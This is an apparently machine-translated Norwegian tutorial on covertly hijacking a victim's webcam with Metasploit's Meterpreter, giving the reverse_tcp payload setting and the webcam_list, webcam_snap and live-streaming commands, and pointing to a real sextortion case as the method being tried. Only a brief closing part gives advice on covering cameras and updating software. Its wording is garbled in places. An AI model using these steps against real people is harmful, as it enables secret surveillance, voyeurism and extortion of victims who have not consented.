i denne opplæringen, vi vil ta en titt på hvordan vi kan hacke inn i et webkamera hemmelighet og eksternt over internett og ta en titt på hva som skjer på den andre siden. Vi bruker Den kraftige Meterpreter Og Kali Linux til å hacke inn i offerets webkamera. Vi tar full kontroll over webkameraet, slår det på, får øyeblikksbilder og til og med streame live video uten at noen noen gang finner ut.I begynnelsen av 2014 ble en hacker dømt til 18 måneder for Å gjøre Nettopp Dette Til Miss Teen USA 2013. Han fant en sårbarhet i datamaskinen hennes( som noen utdatert programvare), tok noen kompromitterende bilder fra webkameraet og presset offeret til å sende flere bilder. Metoden han brukte er akkurat det vi skal prøve ut her.
Vår beste venn meterpreter
kommer til å hjelpe oss med denne hack. Med Meterpreter kan vi kontrollere noens webkamera, installere en keylogger eller plante dine egne virus, stjele private data og gjøre stort sett alt på offerets datamaskin.
for denne opplæringen antar jeg at du allerede har brukt en angrepsmodul for å utnytte Et sårbarhet ved Hjelp Av Metasploit (Hvordan gjør du Dette?). La oss nå komme til det.
hvor å banalisere webkameraer?
Trinn 1: Sett opp meterpreter.
etter at vi har utnyttet offeret, har vi nå muligheten til å sette en nyttelast etter eget valg. Nyttelasten forteller metasploit hva de skal gjøre på offerets datamaskin når den bryter inn. Meterpreter er vår nyttelast. Følgende kommando setter opp vår nyttelast:
set payload windows/meterpreter/reverse_tcp
hvis angrepet var vellykket, metasploit installerer automatisk meterpreter på målsystemet, og vi kan gå videre til hacking webkameraet.
Trinn 2: Finn webkameraet.
Meterpreter har en innebygd modul for å søke og kontrollere det eksterne systemets webkamera. Vi kan starte med å søke om systemet selv har et webkamera eller not.me. kommandoen nedenfor brukes til det, det returnerer oss også navnet på webkameraet.
meterpreter > webcam_list
Og nå bør du se målets webkamera(er) oppført i utgangen.
Trinn 3: Ta øyeblikksbilder
hvis den siste kommandoen ga oss et webkamera, kan vi gå videre og ta et bilde:
meterpreter > webcam_snap
Og nå skal du se et bilde har blitt lagret i mappen/opt/framework3/msf3
bare hodet der
Trinn 4: stream sanntidsvideo Fra Det Hackede Webkameraet
så vi tok bare et bilde, la oss se hvordan du får en live videostrøm. Vi kan gjøre dette ved å skrive kommandoen nedenfor: (Vi bruker –p
parameter for å spesifisere katalogen vi vil gi til videostreamingsfilen)
meterpreter > run webcam -p /var/www
denne kommandoen fyrer opp offerets webkamera og sender videoutgangen til /var/www/webcam.htm
. Du kan åpne opp denne filen og sjekke ut hva som skjer i den andre enden i en live video stream.
hvordan forhindre at ditt eget webkamera blir hacket?
det er flere måter å hacke inn webkameraer. I eksemplet ovenfor, med bare noen få små kommandoer kan vi kikke inn i offerets webkamera. Enhver erfaren sikkerhetsekspert vil fortelle deg at ingen systemer er helt sikre. Det er derfor du bør alltid holde kameraene dekket når den ikke er i bruk. Personlig bruker jeg denne lille gadgeten på både min bærbare og smarttelefon.
Men dette betyr Ikke at du ikke bør bry å holde operativsystemet og programmer oppdatert, tvert imot faktisk. Hvis en hacker kan få kontroll over webkameraet ditt, har systemet blitt utnyttet, det er effektivt nå en bot, en slave av angriperen. Dette betyr at angriperen kan gjøre noe på systemet ditt: få tilgang til dine private data, se alt du skriver, samt alle nettstedene du besøker.
Hvilken enhet bruker du akkurat nå? En smarttelefon? En bærbar pc? Sjansen er at du stirrer direkte på et kamera. Føler du deg plutselig litt urolig? Det burde du. Ikke ta noen sjanser. Hvis du bare dekke opp kameraene og rutinemessig oppdatere all programvare du kan unngå å bli utsatt for et webkamera hacke deg selv.